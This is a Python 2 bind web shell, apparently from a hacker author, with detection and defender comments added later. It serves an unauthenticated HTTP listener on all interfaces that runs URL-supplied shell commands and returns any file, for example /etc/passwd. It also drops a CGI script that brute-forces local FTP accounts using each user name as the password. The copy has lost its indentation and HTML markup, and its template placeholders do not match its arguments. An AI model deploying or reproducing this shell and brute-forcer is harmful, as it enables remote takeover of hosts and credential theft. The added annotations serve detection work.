#!/usr/bin/env python
#-----------------------------------------------+
# ._____________________. |
# Coded by slav0nic | slav0nic0@gmail.com | |
# ^---------------------^ |
# Site: slav0nic.xss.ru |
#-----------------------------------------------+
#script binds a CGI server on port 8000 and gives you a web shell + a simple HTTP server
#
#use: python sl_wb_sh.py [port]
#get file or dir listing: site/?dir/etc/passwd
#cgi dir is created in "homedir"
#"bugz": 1 bug - my enlish ;)
#popen waits until the process terminates, and only after that does the server send the answer => not good :)
#ps: do not use ping and similar long-running commands
#big files (>500mb) take a long time to open (file=open(..).read() ;))
#threads are not used
#############################
#idea=good
#realization=sux :)
########_CONFIG_#############
# Default TCP port for the listener; replaced by sys.argv[1] further down when an argument is given.
PORT = 8000
# Assigned to Handler.server_version below. BaseHTTPServer normally puts that value in the
# "Server:" response header, so this literal is a usable network signature for the tool.
__version__="pyBindWebShell 0.1"
# Optional working directory. When truthy the start-up code chdir()s into it before creating "cgi".
homedir=None #exmpl. homedir="/tmp"
#######_CONFIG_END_#########
import os
import sys
import glob
import mimetypes
from urllib import *
import CGIHTTPServer
import BaseHTTPServer
# The first command-line argument, if present, overrides the listening port.
# int() raises ValueError on a non-numeric argument and nothing here catches it.
if len(sys.argv)>1:
PORT=int(sys.argv[1])
# Build the listing fragment for a list of paths; do_GET calls it with glob.glob(pars_dir+"/*").
# NOTE(review): this copy of the listing lost its indentation and the HTML inside the
# template literal, so the exact nesting and markup cannot be confirmed from here.
def dir_to_lnk(directory):
# Sorts the caller's list in place.
directory.sort()
href_dirs=""
size="0"
for i in directory:
# Display name: last path component as a string for files, as a one-element list for directories.
if os.path.isfile(i):
k=i.split("/")[-1:][0] #for file
else:
k=i.split("/")[-1:] #for dir
# Prefix a "/" unless the path already starts with "//".
if not i.startswith("//"):i="/"+i
try:
# Size in KiB (integer division under Python 2).
size=str(os.path.getsize(i)/1024)
except:
# Bare except: any failure is reported by showing the exception value in the size column.
# sys.exc_value exists only in Python 2.
size=sys.exc_value
# The path, name and size are interpolated as-is; no escaping of file names is visible here.
href_dirs+='
%s %s Kb
'%(i,k,size)
return href_dirs
# Page template written back by Handler.do_GET after a command request.
# NOTE(review): the markup was stripped from this copy. Only two %s placeholders survive,
# while do_GET formats the template with three values (serv_info, PORT, result), so the
# text below is not the complete original template.
index="""
[bind-web_shell 0.1]
Server_Info: %s
|
Bind_web_shell: |
MENU: |:FTP_Brut:| :"Dir. /":
%s
|
"""
# Bundled CGI script, included as an example.
# The start-up code below writes this text to cgi/ftp_br.py and chmods it to 0700; the
# handler then serves it as CGI because "/cgi" is listed in Handler.cgi_directories.
# What the embedded script does, as far as the text shows: it reads every local account
# name with pwd.getpwall() and attempts an FTP login on localhost using each name as its
# own password, printing the names that are accepted.
# Defender notes: the file cgi/ftp_br.py under the process working directory is an on-disk
# indicator; a run would be expected to appear in FTP server logs as a burst of logins from
# the loopback address cycling through local account names. Accounts whose password equals
# the user name are what it finds, so that is the condition to audit for.
ftp_brut=r"""#!/usr/bin/env python
import cgitb; cgitb.enable()
from ftplib import FTP
import sys
import time
import pwd
step=50
users=[]
ok_users=[]
j,i=0,0
for user in pwd.getpwall():
users.append(user[0])
ftp= FTP()
print "Content-Type: text/html\n"
print ''
print "[+]FtpBrut: Users loaded = " ,len(users)
start_time=time.time()
for i in range(len(users)):
if not(i % step) and i!=0:
j+=step
print "[!]bruted %i passwords (%i pass/sec)"%(j,int(j/(time.time()-start_time)))
try:
ftp.connect('localhost') # connect to host, default port
except:
print 'FtpBrut: connection error';break
try:
if(ftp.login(user=users[i],passwd=users[i])):
print "\t[+] l=", users[i],"p=", users[i]
ok_users.append(users[i])
except :
pass
ftp.close()
print "\tCracked", len(ok_users),"users"
print 'Good Logins: %s from %i'%(ok_users,len(users))
"""
# Start-up side effects; all of this runs at module load, before the server starts listening.
# serv_info is collected once: the output of the shell command "whoami;uptime" followed by the
# os.uname() fields. do_GET interpolates it into the page it returns, so the account name and
# host/kernel details are disclosed to whoever requests that page.
serv_info=os.popen("whoami;uptime").read()+str(os.uname()).replace("', '"," ")[1:-1]
# Optionally change into homedir, then create a "cgi" directory relative to the working directory.
# NOTE(review): indentation is lost in this copy, so whether mkdir sits inside the
# "if homedir" branch cannot be confirmed from here.
try:
if homedir:
os.chdir(homedir)
os.mkdir("cgi")
print "[+]CGI dir created"
except:
# Bare except: any failure (for example, the directory already exists) is only printed.
print sys.exc_value
# Write the embedded script to cgi/ftp_br.py and set mode 0700 on every entry matching cgi/*,
# not only on the file just written. "0700" is a Python 2 octal literal.
try:
f_br=open("cgi/ftp_br.py","w")
f_br.write(ftp_brut)
f_br.close()
map(lambda x: os.chmod(x,0700),glob.glob("cgi/*"))
except:
print sys.exc_value
# Request handler: CGIHTTPRequestHandler extended with two path-driven actions.
# NOTE(review): indentation was lost in this copy, so the nesting described in these
# comments is inferred from statement order.
# Nothing in this class checks credentials, a token, or the client address before acting:
#   - when characters 2..4 of the path are "cmd", everything from index 6 on is URL-decoded
#     and passed to os.popen4(), so it is executed through a shell as the server's user;
#   - when characters 2..4 of the path are "dir", everything from index 5 on is treated as a
#     filesystem path that is listed (directory) or returned in full (file).
# Detection: request lines starting with "/?cmd" or "/?dir" (the header comment's own
# example is "site/?dir/etc/passwd"), plus the server_version string assigned below.
class Handler(CGIHTTPServer.CGIHTTPRequestHandler):
# Requests under /cgi are executed as CGI programs by the base class.
cgi_directories = ["/cgi"]
server_version=__version__
def do_GET(s):
cmd="[slav0nic]"
pars_dir=""
show_form=1
new_dir=""
result=""
if s.is_cgi():
# Return to homedir before running the CGI; the failure when homedir is None is ignored.
try:
os.chdir(homedir)
except:
pass
s.run_cgi()
else:
# "<>" is the Python 2 inequality operator.
if s.path <> '/':
if s.path[2:5]=='cmd':
# "+" is turned into a space and the percent-encoding removed; the result is run unfiltered.
parse=unquote(s.path[6:].replace('+',' '))
# popen4 yields (stdin, combined stdout+stderr); read() blocks until the command exits.
trash,cmd=os.popen4(parse)
result=cmd.read()
# The child's "cd" does not affect this process, so the handler re-applies any "cd <dir>"
# found in the ";"-separated command text to its own working directory.
for command in parse.replace("~",os.environ['HOME']).split(";") :
if "cd " in command:
new_dir=command.split()[-1:]
if new_dir:
try: os.chdir(new_dir[0])
except:
result+="[-]ChangeDir_Error: "+str(sys.exc_value)
elif s.path[2:5]=='dir':
# Listing/download mode: the form page is not appended to this response.
show_form=0
pars_dir=unquote(s.path[5:])
if os.path.isdir(pars_dir):
content=glob.glob(pars_dir+"/*")
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(dir_to_lnk(content))
else:
try:
# The whole file is read into memory before anything is sent. No restriction on
# which paths may be read is visible here.
file=open(pars_dir,"rb").read()
s.send_response(200)
s.send_header("Content-type", mimetypes.guess_type(pars_dir)[0])
s.send_header("Content-length", os.path.getsize(pars_dir))
s.end_headers()
s.wfile.write(file)
except:
# Any failure is reported as 404 with the exception value as the message.
s.send_error(404,sys.exc_value)
# No send_response()/end_headers() call is visible before this write.
# NOTE(review): the template as shown has two placeholders but receives three values.
if show_form:
s.wfile.write(index %(serv_info,PORT,result))
s.wfile.write("")
# POST requests go through the same code path as GET.
do_POST=do_GET
# The empty host string binds the listener on all interfaces, so the handler above is
# reachable from any network that can route to this host on PORT.
# BaseHTTPServer.HTTPServer handles one request at a time (the header notes threads are not used).
httpd = BaseHTTPServer.HTTPServer(("", PORT), Handler)
print "[+]Server started.\nPort", PORT
# Blocks until the process is terminated.
httpd.serve_forever()